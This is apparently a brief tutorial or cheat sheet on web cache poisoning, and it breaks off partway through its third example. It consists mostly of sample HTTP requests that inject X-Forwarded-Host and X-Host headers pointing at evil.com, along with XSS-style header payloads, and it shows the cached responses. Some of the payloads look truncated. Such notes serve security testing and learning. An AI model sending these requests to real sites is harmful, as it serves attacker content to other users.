# Web Cache Poisoning
## Introduction
The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users.
## Where to find
`-`
## How to exploit
1. Basic poisoning
```
GET / HTTP/1.1
Host: www.vuln.com
X-Forwarded-Host: evil.com
```
The response is
```
HTTP/1.1 200 OK
Cache-Control: public, no-cache
…
```
> Or you can input XSS payloads
```
GET / HTTP/1.1
Host: www.vuln.com
X-Forwarded-Host: a.\">
```
The response is
```
HTTP/1.1 200 OK
Cache-Control: public, no-cache
…
a.png" />
```
2. Seizing the Cache
```
GET / HTTP/1.1
Host: unity3d.com
X-Host: evil.com
```
The response is
```
HTTP/1.1 200 OK
Via: 1.1 varnish-v4
Age: 174
Cache-Control: public, max-age=1800
…
```
3. Selective poisoning
```
GET / HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 ( Firefox/60.0)
X-Forwarded-Host: a">